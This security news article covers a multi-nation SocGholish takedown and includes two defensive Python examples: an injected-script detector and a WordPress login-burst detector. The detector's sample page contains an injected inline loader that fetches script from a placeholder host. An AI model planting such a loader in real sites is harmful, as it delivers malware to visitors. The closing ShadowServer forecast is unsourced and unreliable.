Multi-Nation Operation Seizes 106 SocGholish C2 Servers, Cleans 14,971 WordPress Sites
A four-country Europol action removed SocGholish infrastructure and cleaned nearly 15,000 WordPress sites. The operation targeted a Russian IAB supplying ransomware and RATs, yet the credential and vulnerability vectors remain unaddressed. Follow-on telemetry will determine whether the botnet contracts or merely fragments.
SocGholish, active since 2017, injects browser-profiling JavaScript into WordPress, Joomla, and Drupal sites via stolen credentials or unpatched vulnerabilities. The loader serves fake update pages that deliver Gholoader, MintsLoader, and then LockBit, RansomHub, AsyncRAT, or GhostWeaver. ShadowServer recorded 1.44 million compromised WordPress instances in May alone; Infoblox reported that 55 percent of its cloud customers touched the framework this year.
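The injection described above leaves a visible trace in the served page: a script tag or inline loader pointing at a host the site never legitimately loads code from. The following Python is an added defender-side example, not code from the article or from any of the cited organizations; it parses a page with the standard library and flags script sources outside an allowlist. The allowlist hosts and the `injected-example.invalid` hostname in the sample page are constructed placeholders, not real indicators.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allowlist: hosts this site is known to load scripts from.
# A real list comes from the site's own theme and plugin inventory.
ALLOWED_SCRIPT_HOSTS = {"example-shop.test", "cdnjs.cloudflare.com"}

# Constructed sample of a page where an extra <script src> and an inline
# loader were injected into the theme header. The hostname is a placeholder.
SAMPLE_PAGE = """<html><head>
<script src="https://example-shop.test/wp-includes/js/jquery.js"></script>
<script src="https://injected-example.invalid/update.js"></script>
<script>var _0x=['x'];(function(){var s=document.createElement('script');
s.src='https://injected-example.invalid/p.js';document.head.appendChild(s);})();</script>
</head><body></body></html>"""

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


class ScriptCollector(HTMLParser):
    """Collects external script sources and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []   # src attribute of every <script src=...>
        self.inline = []     # body text of every inline <script>
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True
                self.inline.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser may deliver a script body in several chunks; join them.
        if self._in_script:
            self.inline[-1] += data


def find_unexpected_scripts(html, allowed_hosts):
    """Return (kind, host) findings for script references outside the allowlist.

    kind is "external-src" for a <script src> pointing at an unknown host, or
    "inline-loader" for an inline script that builds a script element
    dynamically or embeds a URL to an unknown host.
    """
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname
        if host and host not in allowed_hosts:
            findings.append(("external-src", host))
    for body in parser.inline:
        unknown = {h for h in URL_RE.findall(body) if h not in allowed_hosts}
        builds_script = "createElement('script')" in body.replace('"', "'")
        if unknown or builds_script:
            findings.append(("inline-loader", ",".join(sorted(unknown)) or "-"))
    return findings


if __name__ == "__main__":
    for kind, host in find_unexpected_scripts(SAMPLE_PAGE, ALLOWED_SCRIPT_HOSTS):
        print(f"{kind}: {host}")
```

Run it against the rendered HTML of a site's front page (what a visitor's browser sees, not only the theme files on disk), since some injections are assembled at request time. An allowlist check will not catch a loader hosted on the site's own domain, so pair it with file-integrity monitoring of `wp-includes` and theme directories.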
Procurement and incident records show TA569/DEV-0206 functions as an initial-access broker supplying Evil Corp-linked operators. Dutch police notifications targeted credential reuse rather than zero-days, revealing the dominant infection vector remains weak admin hygiene across millions of sites. No public contract awards detail the private-sector sensor feeds used to map the 106 domains.
The takedown removed backdoors but left the underlying credential-stuffing and plugin-vulnerability pipeline intact. Similar operations against SystemBC and GlassWorm produced rapid re-infection within weeks when site owners received only advisory notices.
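Because the credential vector stays open after a takedown, site owners need to see credential stuffing against their own login form. The following Python is an added example, not code from the article or from the cited organizations; it reads Apache/nginx combined-format access lines and alerts on a burst of login POSTs from one address, then on a redirect following such a burst. It relies on WordPress answering a failed `wp-login.php` POST with HTTP 200 (the form is re-rendered) and a successful one with a 302 to the dashboard. The log lines, addresses and thresholds are constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Combined log format: ip ident user [timestamp] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: 203.0.113.5 hammers the login form and then gets a
# redirect; 198.51.100.7 is an ordinary user who mistypes once.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jun/2025:12:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 4123
203.0.113.5 - - [10/Jun/2025:12:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4123
198.51.100.7 - - [10/Jun/2025:12:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4123
203.0.113.5 - - [10/Jun/2025:12:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 4123
203.0.113.5 - - [10/Jun/2025:12:00:04 +0000] "POST /wp-login.php HTTP/1.1" 200 4123
198.51.100.7 - - [10/Jun/2025:12:00:05 +0000] "POST /wp-login.php HTTP/1.1" 302 0
203.0.113.5 - - [10/Jun/2025:12:00:05 +0000] "POST /wp-login.php HTTP/1.1" 200 4123
203.0.113.5 - - [10/Jun/2025:12:00:06 +0000] "POST /wp-login.php HTTP/1.1" 200 4123
203.0.113.5 - - [10/Jun/2025:12:00:07 +0000] "POST /wp-login.php HTTP/1.1" 302 0
203.0.113.5 - - [10/Jun/2025:12:00:08 +0000] "GET /wp-admin/ HTTP/1.1" 200 9001
"""


def parse(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],   # drop ?action=... query strings
        "status": int(m["status"]),
    }


def detect_login_bursts(lines, window_s=60, threshold=5):
    """Return (ip, kind) alerts for login-form abuse.

    kind "burst": the ip reached `threshold` failed POSTs to /wp-login.php
    inside a sliding `window_s`-second window.
    kind "success-after-burst": a 302 (successful login) from an ip that
    currently has at least `threshold` failures in its window.
    """
    failures = defaultdict(deque)   # ip -> timestamps of recent failed POSTs
    alerts = []
    for ev in map(parse, lines):
        if ev is None or ev["method"] != "POST" or ev["path"] != "/wp-login.php":
            continue
        window = failures[ev["ip"]]
        # Expire failures older than the window relative to this event.
        while window and (ev["ts"] - window[0]).total_seconds() > window_s:
            window.popleft()
        if ev["status"] == 200:
            window.append(ev["ts"])
            if len(window) == threshold:          # alert once per burst
                alerts.append((ev["ip"], "burst"))
        elif ev["status"] == 302 and len(window) >= threshold:
            alerts.append((ev["ip"], "success-after-burst"))
    return alerts


if __name__ == "__main__":
    for ip, kind in detect_login_bursts(SAMPLE_LOG.splitlines()):
        print(f"{ip}: {kind}")
```

A `success-after-burst` alert is the one worth paging on: it means a password was guessed, so the account needs a reset and the site a check for the injected loader described earlier. Distributed stuffing spreads attempts across many addresses, so a production version would also count attempts per targeted username from the PHP side, where the username is visible.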
Next indicators will appear in ShadowServer sinkhole telemetry and Proofpoint drive-by telemetry within 60 days; sustained reduction below 300,000 active WordPress implants would signal a durable infrastructure loss rather than temporary relocation.
ShadowServer: Active SocGholish WordPress implants will remain above 800,000 at the 90-day mark.
Sources (3)
- [1] [Primary Source](https://www.securityweek.com/15000-wordpress-websites-cleaned-up-in-socgholish-botnet-takedown/)
- [2] [Supporting Source](https://www.shadowserver.org)
- [3] [Supporting Source](https://www.proofpoint.com)